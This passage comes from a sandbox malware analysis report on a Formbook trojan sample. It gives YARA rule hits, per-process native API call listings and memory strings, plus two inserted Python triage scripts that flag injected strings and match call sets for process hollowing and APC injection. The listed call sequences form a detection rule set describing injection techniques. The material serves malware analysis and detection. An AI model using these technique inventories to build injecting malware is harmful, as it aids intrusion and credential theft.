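                The "String found in binary or memory" rows above and the "Code function" rows in the System Summary section below are easier to read with a small triage script. The Python below is an added example written for this page; it is not part of Joe Sandbox or of the report. It parses the dump descriptor `process, <proc index>.<stage>.<dump id>.<base>.<protection>.….sdmp` on the assumption that the second field is the dump stage (0 = taken at process start, 2 = at analysis end, 3 = mid-run). Under that reading, a URL already present in a stage-0 dump of explorer.exe is baseline host noise (the MSN feed and Office strings), while a URL that appears only in later dumps and in more than one process (explorer.exe and help.exe both holding the Cloudflare 5xx and Hover parking strings) is what strings carried by an injected payload look like. It also checks which members of the process-hollowing call sequence appear among the listed native calls. The sample rows are copied verbatim from this report; the stage semantics and the hollowing API set are the example's own assumptions.

```python
"""Triage helpers for Joe Sandbox 'String found in binary or memory' and
'Code function' rows.  Added example for this page; not part of Joe Sandbox."""
from __future__ import annotations
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# Dump descriptor as printed in the report, e.g.
#   explorer.exe, 00000003.00000002.3831541427.0000000006F33000.00000004.00000001.00020000.00000000.sdmp
# Assumed field order: process index, dump stage, dump id, base address,
# page protection, then three allocation fields this script ignores.
DUMP_RE = re.compile(
    r"(?P<proc>[\w.-]+\.exe), (?P<pidx>[0-9A-F]{8})\.(?P<stage>[0-9A-F]{8})\.\d+\."
    r"(?P<base>[0-9A-F]{16})\.(?P<prot>[0-9A-F]{8})(?:\.[0-9A-F]{8}){3}\.sdmp"
)
STRING_RE = re.compile(r"String found in binary or memory:\s*(?P<url>\S+)")
CODEFN_RE = re.compile(r"Code function:\s*\d+_\d+_[0-9A-F]+\s+(?P<calls>[A-Za-z0-9_,]+)")

STAGE_BASELINE = 0  # assumption: stage-0 dumps are taken at process start, before injection

# Native calls that together implement process hollowing with thread hijack
# (assumed set; matches the report's 'Sample uses process hollowing technique').
HOLLOWING_APIS = frozenset({
    "NtCreateProcessEx", "NtUnmapViewOfSection", "NtCreateSection",
    "NtMapViewOfSection", "NtProtectVirtualMemory", "NtSuspendThread",
    "NtSetContextThread", "NtResumeThread",
})


@dataclass(frozen=True)
class Dump:
    process: str
    stage: int
    base: int
    protection: int


def parse_dumps(line: str) -> list[Dump]:
    """All memory-dump descriptors referenced on one report row."""
    return [Dump(m["proc"], int(m["stage"], 16), int(m["base"], 16), int(m["prot"], 16))
            for m in DUMP_RE.finditer(line)]


def triage_strings(lines: list[str]) -> dict[str, dict]:
    """For each URL: which processes held it and whether it was already present in
    a baseline (stage-0) dump, i.e. before any code was injected."""
    out: dict[str, dict] = {}
    for line in lines:
        m = STRING_RE.search(line)
        if not m:
            continue
        dumps = parse_dumps(line)
        procs = {d.process for d in dumps}
        if not dumps:  # found in the submitted file itself; no dump descriptor
            procs = {line.split("Source: ", 1)[1].split("String found", 1)[0].strip()}
        out[m["url"]] = {
            "host": urlsplit(m["url"]).hostname,
            "processes": sorted(procs),
            "baseline": any(d.stage == STAGE_BASELINE for d in dumps),
        }
    return out


def suspicious_strings(lines: list[str]) -> list[str]:
    """URLs absent from the host's baseline dumps but present in more than one
    process: the footprint of strings carried by an injected payload."""
    return sorted(url for url, info in triage_strings(lines).items()
                  if not info["baseline"] and len(info["processes"]) > 1)


def native_calls(lines: list[str]) -> set[str]:
    """Nt*/Ldr* names referenced by 'Code function' rows (addresses filtered out)."""
    seen: set[str] = set()
    for line in lines:
        m = CODEFN_RE.search(line)
        if m:
            seen.update(n for n in m["calls"].split(",") if re.fullmatch(r"[A-Z][A-Za-z]+", n))
    return seen


def hollowing_coverage(lines: list[str]) -> tuple[set[str], set[str]]:
    """(present, missing) members of HOLLOWING_APIS among the listed native calls."""
    seen = native_calls(lines)
    return seen & HOLLOWING_APIS, HOLLOWING_APIS - seen


# Rows copied verbatim from this report (leading whitespace stripped).
REPORT_LINES = [
    r"Source: explorer.exe, 00000003.00000000.1390264939.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3836964822.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com",
    r"Source: explorer.exe, 00000003.00000002.3839608270.00000000108DF000.00000004.80000000.00040000.00000000.sdmp, help.exe, 00000004.00000002.3828239347.0000000003CFF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open",
    r"Source: explorer.exe, 00000003.00000002.3839608270.00000000108DF000.00000004.80000000.00040000.00000000.sdmp, help.exe, 00000004.00000002.3828239347.0000000003CFF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing",
    r"Source: explorer.exe, 00000003.00000002.3839608270.00000000108DF000.00000004.80000000.00040000.00000000.sdmp, help.exe, 00000004.00000002.3828239347.0000000003CFF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/?source=parked",
    r"Source: duGqHKp0OUXaX1D.exeString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0",
    r"Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_0041A360 NtCreateFile,2_2_0041A360",
    r"Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32D30 NtUnmapViewOfSection,LdrInitializeThunk,2_2_01A32D30",
    r"Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32D10 NtMapViewOfSection,LdrInitializeThunk,2_2_01A32D10",
    r"Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32FB0 NtResumeThread,LdrInitializeThunk,2_2_01A32FB0",
    r"Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32F90 NtProtectVirtualMemory,LdrInitializeThunk,2_2_01A32F90",
    r"Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32F30 NtCreateSection,LdrInitializeThunk,2_2_01A32F30",
    r"Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A34340 NtSetContextThread,2_2_01A34340",
    r"Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A34650 NtSuspendThread,2_2_01A34650",
    r"Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32F60 NtCreateProcessEx,2_2_01A32F60",
]

if __name__ == "__main__":
    for url, info in triage_strings(REPORT_LINES).items():
        print(("baseline " if info["baseline"] else "INJECTED ") + url, info["processes"])
    present, missing = hollowing_coverage(REPORT_LINES)
    print("hollowing APIs present:", sorted(present), "missing:", sorted(missing))
```

                Run over a full report export, `suspicious_strings` yields the URLs worth pivoting on (here the Cloudflare error page, the Hover parking page and the Google Fonts stylesheet that the payload's C2 responses left in both explorer.exe and help.exe) and `hollowing_coverage` confirms that the Nt* listing contains the complete hollowing sequence: create the process suspended, unmap its image, map a new section, fix protections, set the thread context, resume.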

                E-Banking Fraud

                Source: Yara match | File source: 2.2.duGqHKp0OUXaX1D.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 2.2.duGqHKp0OUXaX1D.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.3821500560.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.3821885718.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1370738130.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                System Summary

                Source: 2.2.duGqHKp0OUXaX1D.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 2.2.duGqHKp0OUXaX1D.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 2.2.duGqHKp0OUXaX1D.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 2.2.duGqHKp0OUXaX1D.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 2.2.duGqHKp0OUXaX1D.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 2.2.duGqHKp0OUXaX1D.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000004.00000002.3821500560.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000004.00000002.3821500560.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000004.00000002.3821500560.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000004.00000002.3821885718.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000004.00000002.3821885718.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000004.00000002.3821885718.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.1370738130.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000000.00000002.1370738130.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000000.00000002.1370738130.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: Process Memory Space: duGqHKp0OUXaX1D.exe PID: 7548, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: Process Memory Space: duGqHKp0OUXaX1D.exe PID: 7656, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: Process Memory Space: help.exe PID: 7700, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_0041A360 NtCreateFile,2_2_0041A360
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_0041A410 NtReadFile,2_2_0041A410
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_0041A490 NtClose,2_2_0041A490
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_0041A540 NtAllocateVirtualMemory,2_2_0041A540
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_0041A31D NtCreateFile,2_2_0041A31D
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_0041A40A NtReadFile,2_2_0041A40A
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_0041A53A NtAllocateVirtualMemory,2_2_0041A53A
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A32BF0 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_01A32BF0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A32B60 NtClose,LdrInitializeThunk,2_2_01A32B60
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A32AD0 NtReadFile,LdrInitializeThunk,2_2_01A32AD0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A32DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_01A32DF0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A32DD0 NtDelayExecution,LdrInitializeThunk,2_2_01A32DD0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A32D30 NtUnmapViewOfSection,LdrInitializeThunk,2_2_01A32D30
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A32D10 NtMapViewOfSection,LdrInitializeThunk,2_2_01A32D10
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A32CA0 NtQueryInformationToken,LdrInitializeThunk,2_2_01A32CA0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A32C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_01A32C70
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A32FB0 NtResumeThread,LdrInitializeThunk,2_2_01A32FB0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A32F90 NtProtectVirtualMemory,LdrInitializeThunk,2_2_01A32F90
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A32FE0 NtCreateFile,LdrInitializeThunk,2_2_01A32FE0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A32F30 NtCreateSection,LdrInitializeThunk,2_2_01A32F30
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A32EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_01A32EA0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A32E80 NtReadVirtualMemory,LdrInitializeThunk,2_2_01A32E80
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A34340 NtSetContextThread,2_2_01A34340
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A34650 NtSuspendThread,2_2_01A34650
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A32BA0 NtEnumerateValueKey,2_2_01A32BA0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A32B80 NtQueryInformationFile,2_2_01A32B80
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A32BE0 NtQueryValueKey,2_2_01A32BE0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A32AB0 NtWaitForSingleObject,2_2_01A32AB0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A32AF0 NtWriteFile,2_2_01A32AF0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A32DB0 NtEnumerateKey,2_2_01A32DB0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A32D00 NtSetInformationFile,2_2_01A32D00
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A32CF0 NtOpenProcess,2_2_01A32CF0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A32CC0 NtQueryVirtualMemory,2_2_01A32CC0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A32C00 NtQueryInformationProcess,2_2_01A32C00
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A32C60 NtCreateKey,2_2_01A32C60
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A32FA0 NtQuerySection,2_2_01A32FA0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe | Code function: 2_2_01A32F60 NtCreateProcessEx,2_2_01A32F60
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32EE0 NtQueueApcThread,2_2_01A32EE0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32E30 NtWriteVirtualMemory,2_2_01A32E30
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A33090 NtSetValueKey,2_2_01A33090
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A33010 NtOpenDirectoryObject,2_2_01A33010
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A335C0 NtCreateMutant,2_2_01A335C0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A339B0 NtGetContextThread,2_2_01A339B0
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A33D10 NtOpenProcessToken,2_2_01A33D10
                Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A33D70 NtOpenThread,2_2_01A33D70
Source: C:\Windows\explorer.exe
    Code function: 3_2_0DF0F232 NtCreateFile
    Code function: 3_2_0DF10E12 NtProtectVirtualMemory
    Code function: 3_2_0DF10E0A NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\help.exe
    Code function: 4_2_03332B60 NtClose, LdrInitializeThunk
    Code function: 4_2_03332BF0 NtAllocateVirtualMemory, LdrInitializeThunk
    Code function: 4_2_03332BE0 NtQueryValueKey, LdrInitializeThunk
    Code function: 4_2_03332AD0 NtReadFile, LdrInitializeThunk
    Code function: 4_2_03332F30 NtCreateSection, LdrInitializeThunk
    Code function: 4_2_03332FE0 NtCreateFile, LdrInitializeThunk
    Code function: 4_2_03332EA0 NtAdjustPrivilegesToken, LdrInitializeThunk
    Code function: 4_2_03332D10 NtMapViewOfSection, LdrInitializeThunk
    Code function: 4_2_03332DF0 NtQuerySystemInformation, LdrInitializeThunk
    Code function: 4_2_03332DD0 NtDelayExecution, LdrInitializeThunk
    Code function: 4_2_03332C70 NtFreeVirtualMemory, LdrInitializeThunk
    Code function: 4_2_03332C60 NtCreateKey, LdrInitializeThunk
    Code function: 4_2_03332CA0 NtQueryInformationToken, LdrInitializeThunk
    Code function: 4_2_033335C0 NtCreateMutant, LdrInitializeThunk
    Code function: 4_2_03334340 NtSetContextThread
    Code function: 4_2_03334650 NtSuspendThread
    Code function: 4_2_03332BA0 NtEnumerateValueKey
    Code function: 4_2_03332B80 NtQueryInformationFile
    Code function: 4_2_03332AB0 NtWaitForSingleObject
    Code function: 4_2_03332AF0 NtWriteFile
    Code function: 4_2_03332F60 NtCreateProcessEx
    Code function: 4_2_03332FB0 NtResumeThread
    Code function: 4_2_03332FA0 NtQuerySection
    Code function: 4_2_03332F90 NtProtectVirtualMemory
    Code function: 4_2_03332E30 NtWriteVirtualMemory
    Code function: 4_2_03332E80 NtReadVirtualMemory
    Code function: 4_2_03332EE0 NtQueueApcThread
    Code function: 4_2_03332D30 NtUnmapViewOfSection
    Code function: 4_2_03332D00 NtSetInformationFile
    Code function: 4_2_03332DB0 NtEnumerateKey
    Code function: 4_2_03332C00 NtQueryInformationProcess
    Code function: 4_2_03332CF0 NtOpenProcess
    Code function: 4_2_03332CC0 NtQueryVirtualMemory
    Code function: 4_2_03333010 NtOpenDirectoryObject
    Code function: 4_2_03333090 NtSetValueKey
    Code function: 4_2_033339B0 NtGetContextThread
    Code function: 4_2_03333D10 NtOpenProcessToken
    Code function: 4_2_03333D70 NtOpenThread
    Code function: 4_2_0294A360 NtCreateFile
    Code function: 4_2_0294A490 NtClose
    Code function: 4_2_0294A410 NtReadFile
    Code function: 4_2_0294A540 NtAllocateVirtualMemory
    Code function: 4_2_0294A31D NtCreateFile
    Code function: 4_2_0294A40A NtReadFile
    Code function: 4_2_0294A53A NtAllocateVirtualMemory
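The native-call inventory above is what a responder wants to turn into a verdict quickly: which injection technique each process is equipped for, and whether the stubs seen in help.exe are the sample's own code mapped at a second base. The script below is an added example, not part of the Joe Sandbox report or of the tool's own code. It parses "Code function:" entries in the shape used on this page (both the fused "exeCode function:" form the extraction left behind and a "Source:" line followed by indented entries), aggregates the Nt* names per process, and matches them against a small rule set that is my own heuristic, not Joe Sandbox's signature logic. The input is a handful of entries copied from this report; the help.exe subset deliberately leaves out its NtResumeThread entry so that the near-miss reporting has something to show (on the full list above help.exe satisfies the hollowing rule as well). Because the rules look only at which names a process references, not at the handle each call receives, a hit is a triage hint, not proof that a foreign process was targeted.

```python
import re
from collections import Counter, defaultdict

# Constructed input: entries copied from the report above, in both layouts the
# extraction produced (fused "...exeCode function: ..." and "Source:" followed by
# indented entries). help.exe's NtResumeThread entry is left out on purpose.
SAMPLE_EXE = r"C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe"
HELP_EXE = r"C:\Windows\SysWOW64\help.exe"
EXPLORER = r"C:\Windows\explorer.exe"
SAMPLE_REPORT = r"""
Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32D30 NtUnmapViewOfSection,LdrInitializeThunk,2_2_01A32D30
Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32E30 NtWriteVirtualMemory,2_2_01A32E30
Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A34340 NtSetContextThread,2_2_01A34340
Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32FB0 NtResumeThread,LdrInitializeThunk,2_2_01A32FB0
Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32EE0 NtQueueApcThread,2_2_01A32EE0
Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A33D70 NtOpenThread,2_2_01A33D70
Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32CF0 NtOpenProcess,2_2_01A32CF0
Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32F30 NtCreateSection,LdrInitializeThunk,2_2_01A32F30
Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exeCode function: 2_2_01A32D10 NtMapViewOfSection,LdrInitializeThunk,2_2_01A32D10
Source: C:\Windows\explorer.exe
    Code function: 3_2_0DF0F232 NtCreateFile
    Code function: 3_2_0DF10E12 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\help.exe
    Code function: 4_2_03332D30 NtUnmapViewOfSection
    Code function: 4_2_03332E30 NtWriteVirtualMemory
    Code function: 4_2_03334340 NtSetContextThread
    Code function: 4_2_03332EE0 NtQueueApcThread
    Code function: 4_2_03333D70 NtOpenThread
"""

SOURCE_RE = re.compile(r"Source:\s*(.*?)\s*(?=Code function:|$)")
FUNC_RE = re.compile(r"Code function:\s*(?P<fid>\d+_\d+_[0-9A-Fa-f]{8})\s+"
                     r"(?P<apis>(?:Nt|Zw|Ldr)\w+(?:,\s*(?:Nt|Zw|Ldr)\w+)*)")

# Heuristic rule set (mine, not Joe Sandbox's): native calls a process must reference
# to be flagged. Names alone cannot show whether the handle passed to a call belongs
# to a foreign process; that needs the runtime argument capture.
TECHNIQUES = {
    "process hollowing": {"NtUnmapViewOfSection", "NtWriteVirtualMemory",
                          "NtSetContextThread", "NtResumeThread"},
    "APC injection": {"NtOpenThread", "NtWriteVirtualMemory", "NtQueueApcThread"},
    "cross-process section mapping": {"NtOpenProcess", "NtCreateSection", "NtMapViewOfSection"},
}

def parse_report(text):
    """Map each Source path to {function_id: [api, ...]}. A 'Source:' line sets the
    current process; 'Code function:' on that line or on later lines belongs to it."""
    calls = defaultdict(dict)
    current = None
    for line in text.splitlines():
        src = SOURCE_RE.search(line)
        if src and src.group(1):
            current = src.group(1)
        fn = FUNC_RE.search(line)
        if fn and current:
            calls[current][fn.group("fid")] = [a.strip() for a in fn.group("apis").split(",")]
    return dict(calls)

def native_apis(apis):
    """Keep Nt*/Zw* names only; the report resolves LdrInitializeThunk for some stubs only."""
    return {a for a in apis if a.startswith(("Nt", "Zw"))}

def classify(calls, min_coverage=1.0):
    """Return {source: {technique: (present, missing)}} for every technique whose
    required set is covered at least min_coverage (1.0 = all calls present)."""
    verdicts = {}
    for source, functions in calls.items():
        present = set().union(*(native_apis(a) for a in functions.values()))
        hits = {}
        for name, required in TECHNIQUES.items():
            covered = required & present
            if len(covered) / len(required) >= min_coverage:
                hits[name] = (sorted(covered), sorted(required - present))
        verdicts[source] = hits
    return verdicts

def relocation_delta(calls, src_a, src_b):
    """If src_b's functions are src_a's shifted by one constant (same code mapped at
    another base), return that constant, else None. Functions are paired by native
    call set; the address is the hex tail of the function id."""
    def addr(fid):
        return int(fid.rsplit("_", 1)[1], 16)
    deltas = Counter()
    for fid_a, apis_a in calls.get(src_a, {}).items():
        for fid_b, apis_b in calls.get(src_b, {}).items():
            if native_apis(apis_a) and native_apis(apis_a) == native_apis(apis_b):
                deltas[addr(fid_b) - addr(fid_a)] += 1
    if not deltas:
        return None
    delta, n = deltas.most_common(1)[0]
    return delta if n >= 2 and n * 2 > sum(deltas.values()) else None

if __name__ == "__main__":
    calls = parse_report(SAMPLE_REPORT)
    for source, hits in classify(calls, min_coverage=0.75).items():
        for technique, (present, missing) in hits.items():
            print(f"{source}: {technique}, missing {missing or 'nothing'}")
    print(f"help.exe stubs sit {relocation_delta(calls, SAMPLE_EXE, HELP_EXE):#x} above the sample's")
```

Run on those entries, the sample process satisfies all three rules, help.exe satisfies the APC rule outright and misses the hollowing rule only by NtResumeThread (which is why min_coverage exists: a process one call short of a chain is still worth a look), and relocation_delta reports that the help.exe stubs sit exactly 0x1900000 above the sample's (4_2_03332E30 against 2_2_01A32E30, and so on down the list), i.e. the same code at a second base rather than a second implementation, which is what a sample injecting itself into help.exe looks like in a static function inventory.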
Source: C:\Users\user\Desktop\duGqHKp0OUXaX1D.exe
    Code function: 0_2_00A4D484
    Code functions: 2_2_00401030, 2_2_0041D882, 2_2_0041E154, 2_2_0041EB76, 2_2_00402D89,
        2_2_00402D90, 2_2_0041E59D, 2_2_00409E5B, 2_2_00409E60, 2_2_00402FB0,
        2_2_01AC01AA, 2_2_01AB41A2, 2_2_01AB81CC, 2_2_019F0100, 2_2_01A9A118,
        2_2_01A88158, 2_2_01A92000, 2_2_01AC03E6, 2_2_01A0E3F0, 2_2_01ABA352,
        2_2_01A802C0, 2_2_01AA0274, 2_2_01AC0591, 2_2_01A00535, 2_2_01AAE4F6,
        2_2_01AA4420, 2_2_01AB2446, 2_2_019FC7C0, 2_2_01A00770, 2_2_01A24750,
        2_2_01A1C6E0, 2_2_01A029A0, 2_2_01ACA9A6, 2_2_01A16962, 2_2_019E68B8,
        2_2_01A2E8F0, 2_2_01A0A840, 2_2_01A02840, 2_2_01AB6BD7, 2_2_01ABAB40,
        2_2_019FEA80, 2_2_01A18DBF, 2_2_019FADE0, 2_2_01A0AD00, 2_2_01A9CD1F,
        2_2_01AA0CB5, 2_2_019F0CF2, 2_2_01A00C00, 2_2_01A7EFA0, 2_2_01A0CFE0,
        2_2_019F2FC8, 2_2_01A42F28, 2_2_01A20F30, 2_2_01AA2F30, 2_2_01A74F40,
        2_2_01A12E90, 2_2_01ABCE93, 2_2_01ABEEDB, 2_2_01ABEE26, 2_2_01A00E59,
        2_2_01A0B1B0, 2_2_01ACB16B, 2_2_01A3516C, 2_2_019EF172, 2_2_01AB70E9,
        2_2_01ABF0E0, 2_2_01A070C0, 2_2_01AAF0CC, 2_2_01A4739A, 2_2_01AB132D,
        2_2_019ED34C, 2_2_01A052A0, 2_2_01AA12ED, 2_2_01A1B2C0, 2_2_01A9D5B0,
        2_2_01AB7571, 2_2_01ABF43F, 2_2_019F1460, 2_2_01ABF7B0, 2_2_01AB16CC,
        2_2_01A95910, 2_2_01A09950, 2_2_01A1B950, 2_2_01A038E0, 2_2_01A6D800,
        2_2_01A1FB80, 2_2_01A75BF0, 2_2_01A3DBF9, 2_2_01ABFB76, 2_2_01A45AA0,
